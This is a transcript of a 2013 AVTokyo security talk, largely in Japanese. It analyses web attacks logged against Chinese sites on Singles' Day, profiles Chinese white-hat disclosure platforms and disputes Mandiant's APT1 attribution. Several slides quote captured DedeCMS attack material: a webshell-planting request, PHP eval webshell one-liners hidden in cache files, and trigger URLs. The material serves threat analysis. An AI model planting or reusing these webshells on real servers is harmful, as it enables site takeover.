avtokyo 2013.5 - china is a victim, too :-)

67
China is a victim, too :) (AVTokyo Special Edition) Darkfloyd x Zetta, VXRL

Upload: anthony-lai

Post on 27-Jun-2015

3.039 views

Category:

Technology


2 download

DESCRIPTION

{Anthony LAI, Zetta KE}, Researcher [en] China is a victim, too :-) アンソニー・ライ、ゼッタ KE 中国はいつも他者を攻撃する攻撃者として認識されているが、逆に「中国が誰かから攻撃を受けているのではないか?」という視点で、どのような攻撃をうけ、どんな理由があるのか?をお見せしよう。 さらに、他の有名な機関から発表されたAPTの調査報告書の内容から、中国からの攻撃を「推測」し、それらの「論理」についてのコメントする。 また、我々はKnownsecからキャプチャされたWeb攻撃データをVXRLで解析を行っており、うまくいけば、より鮮明な絵をお見せすることができると考えている。 もちろん、アジェンダにないオフレコ情報もあるので、みなさんに楽しんでもらえると思う。 China is always taken as an attacker to attack others, let us take a look who is attacking China, what kind of attacks China is suffering from and the possible reason, moreover, we would like to take APT research report published from other famous agency how they "deduce" the attacks from China, commenting on their "logic". In addition, we have got Knownsec to provide captured and identified Web attack data to VXRL for analysis, hopefully, we could get a much more clearer picture. Of course, we got a hidden agenda as well. It would be a fun session and let us enjoy it..

TRANSCRIPT

Page 1: AVTokyo 2013.5 - China is a victim, too :-)

China is a victim, too :) (AVTokyo Special Edition)

Darkfloyd x Zetta, VXRL

Page 2: AVTokyo 2013.5 - China is a victim, too :-)

免責条項

 我々は、中国や香港の政府で

働いているわけではなく、支援やお金ももらってません。

Page 3: AVTokyo 2013.5 - China is a victim, too :-)

目的

● いつも中国は積極的な攻撃者側であるとされているが、解析を通じて別の側面が見えてきた :− Part1:中国の様々なWebサイトに対する攻撃を解析したある一日

− Part2:中国ではソフトやサイトの脆弱性はどのように公開されているか知っていますか?

● 報道はいつも中国のブラックハット側ばかりを扱うが、ホワイトハットはどうなってるの?

− Part3:APT1レポートへの反論 (Ran2より )

Page 4: AVTokyo 2013.5 - China is a victim, too :-)

Part 1:中国の様々なWebサイトに対する攻撃を解析したある一日

Page 5: AVTokyo 2013.5 - China is a victim, too :-)

研究と解析

● 北京の Knownsecのクラウドベースのアプリケーション FWからキャプチャした攻撃のログ /データと VXRLで解析をした結果を共有している。

● 我々は 11月 11日を解析した。この日は中国本土でオンラインショッピング /電子商取引の割引が行われる日 (Single's Day,光棍節 ) 。

● 我々は攻撃の重要度やインパクトを考慮して被害者の IPやドメイン名は公開しない。

Page 6: AVTokyo 2013.5 - China is a victim, too :-)

Single's Day, 光棍節とは ?

Page 7: AVTokyo 2013.5 - China is a victim, too :-)

Single's Day, 光棍節とは ?

Page 8: AVTokyo 2013.5 - China is a victim, too :-)

Single’s Dayは米国でいえばサイバーマンデー

http://en.wikipedia.org/wiki/Singles_Day

Page 9: AVTokyo 2013.5 - China is a victim, too :-)

研究と解析

● 我々は何を観察して解析をしたいのか?

− 割合分布:海外からの攻撃 vs国内からの攻撃

− 主な被害者はどんな攻撃を受けている?

− 優秀な攻撃者? どんな攻撃手法を好む?

− どんなシステムやプラットフォームがターゲットになっている?

− その他興味深い攻撃ペイロードは?

Page 10: AVTokyo 2013.5 - China is a victim, too :-)

11/11の攻撃トラフィック vsペイロード

攻撃トラフィック( 1分ごとの合計)

Page 11: AVTokyo 2013.5 - China is a victim, too :-)

11/11の攻撃トラフィック vsペイロード :夕方から夜

攻撃トラフィック( 1分ごとの合計、スキャナーのトラフィックを除外)

Page 12: AVTokyo 2013.5 - China is a victim, too :-)

攻撃タイプの分布Attack Type No. of Request Percentage

SCANNER 59101248 91.3447%

LRFI 218753 0.3381%

FILEI 222774 0.3443%

SPECIAL 35838 0.0554%

WEBSHELL 42463 0.0656%

COLLECTOR 4491625 6.9421%

SQLI 274792 0.4247%

XSS 225796 0.3490%

OS_COMMAND 1022 0.0016%

CODE 86140 0.1331%

OTHERS 887 0.0014%

64701338 100.00%

Page 13: AVTokyo 2013.5 - China is a victim, too :-)

電子ショッピングの日 (2013/11/11) の攻撃者はどこにいる?解析結果から 97.5 %は「中国国内の IPから」

残り 2.5%は海外からそれらにはスキャナーも含む

Page 14: AVTokyo 2013.5 - China is a victim, too :-)

スキャナーからの攻撃を除いたらどうでしょうか?

Country AttackChina 1070489US    18588Netherlands 5404Hong Kong 4288Korea 1823Turkey 1429Japan 872

Page 15: AVTokyo 2013.5 - China is a victim, too :-)

攻撃者トップ 25

24位はアメリカそれ以外はすべて中国

Page 16: AVTokyo 2013.5 - China is a victim, too :-)

ケーススタディ:中国は被害者であるかないか?!

Page 17: AVTokyo 2013.5 - China is a victim, too :-)

“いい人ランキング”への投票

Tou.php – “Tou” は “投票” , 中国語で “投”

このサイトへのリクエストデータは 6.5GBにもなる。

事実、我々中国人は「良い行いと、善良な人」に対してポジティブにサポートをする

ただ、実際の投票とロボットによる投票の区別は難しい

Page 18: AVTokyo 2013.5 - China is a victim, too :-)

我々は、香港から攻撃トラフィックを発見した

Abuse X-Forwarder to fake different IP address to voting from 58.64.X.X

Page 19: AVTokyo 2013.5 - China is a victim, too :-)

それは私が好きな ISPだった :)

Page 20: AVTokyo 2013.5 - China is a victim, too :-)

11/11のショッピングの日 (Single’s Day)!

「グループ購入のサイト」へ 47回の古い OSコマンドの攻撃通信を見つけた

Page 21: AVTokyo 2013.5 - China is a victim, too :-)

海外からの攻撃はどうだろう?

どこから?Country IPChina 116.252.224.162US 173.208.240.190Korea 119.70.29.137Hong Kong 58.64.205.27Thailand 110.34.230.226Taiwan 118.233.66.105Japan 202.89.232.79

Page 22: AVTokyo 2013.5 - China is a victim, too :-)

観察:海外からの興味深い攻撃はあるか?アメリカから?!中国の Pythonレイヤー 7の DDosスクリプト?!( 0:00-2359)

Page 23: AVTokyo 2013.5 - China is a victim, too :-)

観察:中国のツールがアメリカの IPアドレスから :)http://www.dklkt.cn/article.asp?id=233

Page 24: AVTokyo 2013.5 - China is a victim, too :-)

アメリカからの攻撃はあるか?

Page 25: AVTokyo 2013.5 - China is a victim, too :-)

アメリカからの攻撃はあるか?

• 最近は CMSの脆弱性に関するスキャンと探索• 詳細はのちほど紹介• CMSとフォーラムが標的

Page 26: AVTokyo 2013.5 - China is a victim, too :-)

日本からの攻撃はあるか?

Page 27: AVTokyo 2013.5 - China is a victim, too :-)

日本からの攻撃はあるか?

特別なものはない、単純なダウンロード、スキャナーからの通信興味深いのは中国のスキャンサービスwebscan.360.cn は日本の IPアドレスを使用している。

Page 28: AVTokyo 2013.5 - China is a victim, too :-)

韓国からの攻撃はあるか?

こちらも特別なものはない、単純なダウンロード、スキャナーからの通信315online.com.cn はアンチオンライン詐欺のポータルサイト

Page 29: AVTokyo 2013.5 - China is a victim, too :-)

台湾やタイからの攻撃はあるか?

典型的なスキャナーの通信、特別なものは無い

Page 30: AVTokyo 2013.5 - China is a victim, too :-)

オランダからの攻撃はあるか?

中国のWordpressに似たサイトへのスキャン

Page 31: AVTokyo 2013.5 - China is a victim, too :-)

観察:被害者送られた特別なペイロード

● <URL>/plus/download.php?open=1&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=109&arrs2%5B%5D=121&arrs2%5B

● DedecmsにWebshellバックドアを作成

● Dedecmsの脆弱性を使って多くの攻撃を受けているhttp://www.wooyun.org/searchbug.php?q=dedecms

Page 32: AVTokyo 2013.5 - China is a victim, too :-)

Dedecms (中国製 CMS)

Page 33: AVTokyo 2013.5 - China is a victim, too :-)
Page 34: AVTokyo 2013.5 - China is a victim, too :-)

DedeCMS

Page 35: AVTokyo 2013.5 - China is a victim, too :-)

参考 : DedeCMS Exploit Interesting technique to hid the webshell: put it like a cache file.http://www.nxadmin.com/penetration/1168.html http://blog.csdn.net/seoyundu/article/details/12855759

/plus/download.php exploit - Inject Webshellhttp://www.xiaosedi.com/post/dedecms_exp_01.html

/plus/search.php exploit - Inject Webshellhttp://eoo.hk/oswork/28.htm

DedeCMS backdoor killer from Anquan.orghttp://edu.cnw.com.cn/edu-security/netsec/websec/htm2013/20130807_278959.shtml

Page 36: AVTokyo 2013.5 - China is a victim, too :-)

ログに 90sec.php を見つけて、 .inc ファイルに以下のステートメントがあった :{dede:php}file_put_contents(’90sec.php’,'<?php eval($_POST[guige]);?>’);{/dede:php}でも、そんなフォルダーは見つからないなぜ?data/cache フォルダー配下に、以下のコードを含む複数の htm (myad-1.htm,myad-16.htm,mytag-1208.htm) ファイルが見つかった :<!–document.write(“dedecmsisok<?php @eval($_POST[cmd]);?>”);–><!–document.write(“<?php $fp = @fopen(‘av.php’, ‘a’);@fwrite($fp, ‘<?php eval($_POST[110]) ?>axxxxx’);echo ‘OK’;@fclose($fp);?>”);–><!–document.write(“<?php echo ‘dedecms 5.7 0day<br>guige, 90sec.org’;@preg_replace(‘/[copyright]/e’,$_REQUEST['guige'],’error’);?>”);–>

Page 37: AVTokyo 2013.5 - China is a victim, too :-)

おかしい、 .htmページが webshellとして機能している。そして .htmファイルが他の phpファイルを includeしている。チェックをしたら /mytag_js.php が追加されていた

Page 38: AVTokyo 2013.5 - China is a victim, too :-)

スキャナーに検出されることなく、様々な IDを渡しながら、以下の URLで webshellバックドアをトリガーする :

http://www.nxadmin.com/plus/mytag_js.php?id=1208

http://www.nxadmin.com/plus/ad_js.php?id=1

参考 :http://www.nxadmin.com/penetration/1168.html

Page 39: AVTokyo 2013.5 - China is a victim, too :-)

Part 2: 中国のホワイトハット組織

Page 40: AVTokyo 2013.5 - China is a victim, too :-)

中国のホワイトハットWooyun: 中国でバグを公表

● コンセプトはMiterの CVEに似てるが、より有益で組織化されている

● ベンダーに対して中立

● 一般に公開している

● ホワイトハットコミュニティを支援している (http://www.wooyun.org/whitehats/)

Page 41: AVTokyo 2013.5 - China is a victim, too :-)

観察 #1: CMSのバグはいたるところにある

http://www.wooyun.org/bug.php?action=list&subtype=52

(以下はグーグル翻訳結果、実際は中国語 )

Page 42: AVTokyo 2013.5 - China is a victim, too :-)

観察 #2: ホワイトハットが脆弱性を報告しても…

● ホワイトハットが 360に対して高リスクの脆弱性を報告したが、 360は「無視する !」と言った

● ファック!( -_-)凸

Page 43: AVTokyo 2013.5 - China is a victim, too :-)
Page 44: AVTokyo 2013.5 - China is a victim, too :-)
Page 45: AVTokyo 2013.5 - China is a victim, too :-)

かたくなに無視されている高~中レベルの脆弱性 (黄色で強調 )

http://www.wooyun.org/corps/%E5%A5%87%E8%99%8E360

Page 46: AVTokyo 2013.5 - China is a victim, too :-)

観察 #3: ベンダーからの報奨金とホワイトハットの促進

Page 47: AVTokyo 2013.5 - China is a victim, too :-)

Zoomeye (www.zoomeye.org)

Page 48: AVTokyo 2013.5 - China is a victim, too :-)

中国のホワイトハット : Anquan.org (様々なソフトウェアやセキュリティ製品ベンダーの間でのセキュア同盟 )

● 800のベンダー● ベンダーに対して中立

● どんな違反行為、プライバシー侵害、フィッシングアタック等に対しても報告できる公共のプラットフォーム

● http://www.anquan.org/help/aboutus/authen/

Page 49: AVTokyo 2013.5 - China is a victim, too :-)

まだ時間があるなら、、、Part 3: APT1レポート - VXRLの Ran2からの反論

Page 50: AVTokyo 2013.5 - China is a victim, too :-)

APT1レポート : 反論

● Mandiantの APT1レポートを読んだ人いる?● VXRLの研究者、 Ran2がレポートを分析した。

● Mandiantは、中国人民解放軍 61389部隊から米国への攻撃があったと推測 :− 攻撃者のパスワード

− フォーラムの投稿

 から攻撃者をプロファイリング

Page 51: AVTokyo 2013.5 - China is a victim, too :-)

Mandiantの APT1レポート

● 2013年 2月 18日に、 Mandiantは前例のない報告書を発表した。

● "APT1: 中国のサイバースパイユニットの一つに関する暴露 "

● Mandiantは、人民解放軍( PLA)の 61398部隊と、 APT攻撃グループ APT1(別名コメントクルー)とを結ぶ証拠を発見したと主張

Page 52: AVTokyo 2013.5 - China is a victim, too :-)

Mandiantの APT1レポート

● 中国当局は、Mandiantが非難している APTの活動へのつながりを全面的に否定している。

● 数名の論評家曰く: "Mandiantは明らかにBeijing(北京)の犯行現場を抑えている "

● しかし、懐疑論者曰く: "Mandiantによって証拠が中国または PLAに向けられるようにでっち上げられている。結論に説得力のあるハッキングの証拠が含まれていなかった "

Page 53: AVTokyo 2013.5 - China is a victim, too :-)

事実の解明 #1: 攻撃者のプロファイリング

● 「 APT1はデジタルマシンの中の幽霊ではない」とMandinatは主張する。MandinatはAPT1のペルソナの数を特定した。 APT1レポートの 51ページでは、 APT1のペルソナを特定したデータマイニングによるプロファイリングの方法についてのヒントが示されている。

− APT1のデジタル兵器の作者 (つまり、マルウェアの作者 )

− APT1の FQDNの登録者 (別名 FQDNプロファイリング )

− 電子メールアカウント (ソーシャルウェブサイトで使われた )

− 漏洩した Rootkit.comアカウントの登録記録

Page 54: AVTokyo 2013.5 - China is a victim, too :-)

事実の解明 #1: 攻撃者のプロファイリング

● プロファイリングの結果に基づき、上海を拠点にし、マルウェアの作者と連絡を取る義務があり、 APT1攻撃の準備および実行した 3つのペルソナは PLAのために働いているとMandiantはと信じていた。

● UglyGorilla( UG)は、上記の結論につながる特定された主要なペルソナである。

Page 55: AVTokyo 2013.5 - China is a victim, too :-)

事実の解明 #1: 攻撃者のプロファイリング

● さらにインターネット上で検索し、私もまた中国の軍事フォーラムで Jack Wangの投稿を発見した。 UglyGorillaもしくは Jack Wangが、実際に 15のメッセージを投稿したことを私は発見したが、サイバー戦争に関連する投稿はたったの 2つしかなかった。その他のトピックは通常の戦争やバイオ化学兵器の話題であった。彼は軍事戦争の愛好家としてフォーラムに投稿していたが、彼自身が兵士であると言及していなかった。私はこの情報も APT1レポートの中で開示されるべきだと思う。

Page 56: AVTokyo 2013.5 - China is a victim, too :-)
Page 57: AVTokyo 2013.5 - China is a victim, too :-)

事実の解明 #1: 攻撃者のプロファイリング

● UglyGorillaが APT1マルウェアの作成者であるJack WangまたはWang Dongであることを証明する高い可能性を持っているにもかかわらず、私は彼が中国兵または PLAの 61398部隊にサービスを提供している証拠を見つけていません。私は見つけることができる唯一のつながりは中国の軍事フォーラムでの彼の投稿ですが、自分がただの軍事愛好家と述べただけだった。

Page 58: AVTokyo 2013.5 - China is a victim, too :-)

事実の解明 #1: 攻撃者のプロファイリング

● UglyGorillaと同様に、 APT1レポートに記されたもう一つのペルソナ、 DOTAを特定しました。キャプチャされたビデオより、 DOTAはメールアカウントを登録するため一度だけ使用され、監視対象の踏み台への RDP接続によって得た情報だと私は考えています。

Page 59: AVTokyo 2013.5 - China is a victim, too :-)

事実の解明 #1: 攻撃者のプロファイリング

● DOTAは上海の電話を使用していたし、他の関係者と通信するとき、彼は英語に堪能であることが明確に証明されている。私は、 DOTAが「 2j3c1k」(二局三处一科)総参謀部第三部第二局を意味するパスワードを使用していると信じている。

● しかし、我々は、他に(二鸡三吃一刻)「 3種類の方法で 2羽の鶏を調理した瞬間」の意味でもあることを否定できない。

Page 60: AVTokyo 2013.5 - China is a victim, too :-)

事実の解明 #1: 攻撃者のプロファイリング

● はい、それは興味深いですね。中国語を簡単な文字で表す方法はたくさんあります。

● 私は告発するための出口を探そうとしている訳ではありませんが、 APT1が PLAの 61398部隊であることを指し示す確固たる証拠を見たい。

Page 61: AVTokyo 2013.5 - China is a victim, too :-)

事実の解明 # 2:インフラ、リモートデスクトップセッション

● Mandiantは 4ページで、 1905のうち 1849セッションで「中国語(簡体字) - 米国のキーボード」キーボードレイアウトを使用したと付言している。また、彼らは攻撃者がMicrosoftのOSの中国語版を使用したと考えている。攻撃者がMicrosoftの OSの中国語版を使用しているという理由で、Mandiantは APT1は中国本土にいる人間であると考えている。

Page 62: AVTokyo 2013.5 - China is a victim, too :-)

事実の解明 # 2:インフラ、リモートデスクトップセッション

● RDPクライアントは RDPサーバ(ここでは、被害者または踏み台)に 4バイトのキーボードのレイアウトを送信することが、マイクロソフトの RDPプロトコル文書から分かった。 RDPサーバにネットワークスニファをインストールすることで、デジタルな証拠を得ることができます。攻撃者が「中国語(簡体字) - USキーボード」を使用した場合、受信者側では、ネットワークパケットから 0x0804という 4バイトの証拠の検出ができます。

Page 63: AVTokyo 2013.5 - China is a victim, too :-)
Page 64: AVTokyo 2013.5 - China is a victim, too :-)

APT1レポートへの反論のさらなる詳細は

− http://espionageware.blogspot.hk/

Page 65: AVTokyo 2013.5 - China is a victim, too :-)

まとめ● 中国のサイトへ対する興味深いペイロードと実践を紹介しました

● 11月 11日の海外から中国へのWeb攻撃 (電子商取引サイトへの大量のアクセス )は、少数派によって行われていました。

● クローラーとスキャナーがトラフィックの大多数を占め、それ以外の大半は SQLインジェクションです。

● 中国では CMSシステムへの攻撃が多発している。

● 中国にはセキュリティコミュニティを支援する Wooyun.org や Anquan.org のような非営利のホワイトハットがいます。

Page 66: AVTokyo 2013.5 - China is a victim, too :-)

まとめ● 我々は、技術的なより合理的な推論、十分な証明、科学的解析を元にした技術レポートを期待します。

● 中国を単純にサイバー戦争の当事者と関連付けることの無い中立的な立場の分析レポートを望んでいます。

● 中国のセキュリティに対する、より公平なコメントを望んでいます。

● 誤った恐怖感を植えつけることで、製品やソリューションを売りつけることは簡単です。しかし、研究者として高い倫理観と確かな思考を備えておいてください。私たちは研究者であり科学者ですが日和見主義者です

Page 67: AVTokyo 2013.5 - China is a victim, too :-)

感謝 Thank you so much :)

Zettaと Ran2の仕事、分析、時間に尊敬と感謝

Knownsecの研究目的の攻撃ログの共有に深い感謝

[email protected]@[email protected]